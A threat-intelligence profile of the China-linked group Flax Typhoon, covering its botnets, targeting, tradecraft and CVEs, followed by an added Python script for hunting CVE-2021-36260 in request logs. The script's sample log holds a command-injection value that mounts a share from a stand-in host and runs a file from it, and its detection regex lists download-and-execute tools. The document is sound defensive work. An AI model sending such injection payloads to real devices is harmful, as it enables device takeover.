Flax Typhoon
Flax Typhoon is a China-based nation-state threat actor, also tracked as Ethereal Panda and as the Microsoft cluster Storm-0919. Microsoft described the group as active since mid-2021. U.S. officials and the FBI have stated that Flax Typhoon operated at the direction of the Chinese government, and the FBI assessed that Beijing-based Integrity Technology Group was responsible for intrusion activity attributed to Flax Typhoon. Court documents and government reporting described Integrity Technology Group as a publicly traded Beijing company and PRC government contractor that developed and controlled botnet infrastructure used by the group.

The group has primarily targeted government agencies, education, critical manufacturing, and information technology organizations in Taiwan, and has also successfully attacked multiple U.S. and foreign corporations, universities, government agencies, telecommunications providers, media organizations, and critical infrastructure providers. Reporting also links Flax Typhoon to broader targeting of U.S. interests and to activity against critical infrastructure sectors including communications, energy, transportation, and water. Taiwan's NSB named Flax Typhoon among Chinese groups involved in sustained targeting of Taiwan's critical sectors, including energy, healthcare, communications, government, and technology.

Flax Typhoon has used covert networks of compromised infrastructure to conduct cyber espionage and to disguise malicious activity. Multiple government advisories state that China-nexus actors including Flax Typhoon use large-scale covert networks built from compromised SOHO routers, IoT devices, IP cameras, DVRs, firewalls, and NAS devices across the cyber kill chain for reconnaissance, malware delivery, command and control, and data exfiltration. The group has been linked to the Raptor Train botnet, which Black Lotus Labs assessed with medium to high confidence was operated by Flax Typhoon. U.S. law enforcement disrupted a Flax Typhoon-linked botnet of more than 200,000 consumer devices; separate reporting states the Mirai-variant botnet had exploited more than 260,000 IoT devices globally. The botnet was used to disguise malicious cyber activity as routine internet traffic from infected devices. During the FBI disruption, Flax Typhoon attempted to migrate infected devices to new infrastructure and launched a DDoS attack against FBI operational infrastructure.

Observed tradecraft includes use of legitimate SoftEther VPN software to obfuscate activity, maintain persistence, and evade detection; protocol tunneling and abuse of external remote services; and maintenance of long-term access, including reporting that the group kept year-long access to one environment by turning an ArcGIS Server Object Extension (SOE) into a web shell backdoor. Reporting also links Flax Typhoon-associated botnet activity to exploitation of vulnerabilities in routers, IP cameras, and NAS devices, with activity including DDoS attacks and data theft.
Targeting
Sector, geography, and (where attributed) the state behind the operation, drawn from open-source reporting and Mallory's analyst review.
Where they're from
Attributed origin per open-source reporting.
- CN
Tradecraft
36 distinct MITRE ATT&CK techniques observed across reporting, grouped by tactic, each backed by an evidence excerpt from the source.
Associated malware families
12 malware families attributed to this actor across reporting.
7 additional families tracked in Mallory.
Associated vulnerabilities
4 CVEs this actor has used in observed campaigns. 4 of them exploited in the wild.
There was also widespread, global targeting, such as a government agency in Kazakhstan, along with more targeted scanning and likely exploitation attempts against vulnerable software including Atlassian Confluence servers and Ivanti Connect Secure appliances (likely via CVE-2024-21887) in the same sectors.
VulnCheck observed an attacker in the wild using mount as a “download and execute” GTFOBin while attempting to exploit Hikvision CVE-2021-36260... CVE-2021-36260 is a command injection vulnerability affecting the /SDK/webLanguage endpoint.
CISA first warned of the issues in September, when it ordered all agencies to patch CVE-2025-20333 and CVE-2025-20362 — two vulnerabilities impacting Cisco Adaptive Security Appliances (ASA).
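As an added example, not code from this page or from any of the vendors quoted above, the following Python hunts for the CVE-2021-36260 pattern described in the VulnCheck excerpt: a request to the Hikvision /SDK/webLanguage endpoint whose body carries shell metacharacters, with severity raised when a download-and-execute helper such as mount appears alongside them. The only facts taken from the page are the endpoint and the use of mount; the JSON-lines log format, the field names, the metacharacter and tool lists, and the sample log lines (TEST-NET addresses) are assumptions constructed for the demonstration.

```python
"""Hunt for CVE-2021-36260 (Hikvision /SDK/webLanguage command injection)
exploitation attempts in HTTP request logs.

Added example, not code from the page or any vendor.  Assumptions:
  * a reverse proxy or WAF in front of the camera logs one JSON object per
    line with "src", "method", "path" and "body" fields (hypothetical);
  * the injection rides inside the body sent to /SDK/webLanguage, so shell
    metacharacters in that body are the signal (assumption, not from the page).
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

TARGET_PATH = "/SDK/webLanguage"

# Command substitution and command separators: none of these belong in a
# language-selection body.
INJECTION_MARKERS = re.compile(r"\$\(|`|;|&&|\|")

# Binaries an attacker can turn into "download and execute" on a stripped
# BusyBox camera.  `mount` is the one named in the VulnCheck excerpt; the
# others are an assumption added for coverage.
DOWNLOAD_EXEC = re.compile(r"\b(mount|wget|curl|tftp|busybox)\b")


@dataclass
class Finding:
    src: str
    severity: str  # "high" or "medium"
    reason: str
    body: str


def analyze_request(rec: dict) -> Finding | None:
    """Return a Finding when one log record looks like a webLanguage injection."""
    if not rec.get("path", "").startswith(TARGET_PATH):
        return None
    body = rec.get("body") or ""
    if not INJECTION_MARKERS.search(body):
        return None
    tool = DOWNLOAD_EXEC.search(body)
    src = rec.get("src", "?")
    if tool:
        return Finding(src, "high",
                       f"metacharacters plus {tool.group(1)} in webLanguage body", body)
    return Finding(src, "medium", "shell metacharacters in webLanguage body", body)


def scan_log(lines) -> list[Finding]:
    """Parse JSON lines, skip malformed ones, and collect findings in log order."""
    findings: list[Finding] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or non-JSON line: skip it rather than abort the hunt
        finding = analyze_request(rec)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log (TEST-NET addresses), not real telemetry.
SAMPLE_LOG = [
    '{"src": "192.0.2.10", "method": "PUT", "path": "/SDK/webLanguage", '
    '"body": "<?xml version=\\"1.0\\" encoding=\\"UTF-8\\"?><language>en</language>"}',
    '{"src": "198.51.100.7", "method": "PUT", "path": "/SDK/webLanguage", '
    '"body": "<?xml version=\\"1.0\\"?><language>$(mount -t nfs 203.0.113.5:/x /tmp/m; /tmp/m/run)</language>"}',
    '{"src": "198.51.100.9", "method": "PUT", "path": "/SDK/webLanguage", '
    '"body": "<language>en;id</language>"}',
    '{"src": "192.0.2.11", "method": "GET", "path": "/ISAPI/System/deviceInfo", "body": ""}',
    "this line is not json",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f.severity}] {f.src}: {f.reason}")
```

Run against the constructed sample it reports one high finding (the mount payload) and one medium finding (the `;id` separator), ignores the benign language change and the unrelated ISAPI request, and survives the malformed line. Because access logs rarely record request bodies, the check is only useful where a proxy or WAF in front of the camera captures them; without bodies, the fallback is to alert on any write to /SDK/webLanguage from outside the management network.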
Observables
11 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Linked to use of CDN-based traffic concealment techniques and SoftEther VPN to maintain persistence and evade detection.
Referenced as a China-based threat actor involved in activity against the FBI and its partners during a disruption operation.
China-linked APT group referenced as building covert relay infrastructure by compromising consumer-grade IoT and SOHO devices to route attack traffic and evade IP-based blocking.
Uses covert networks of compromised SOHO routers and IoT devices to disguise espionage operations and target critical infrastructure sectors.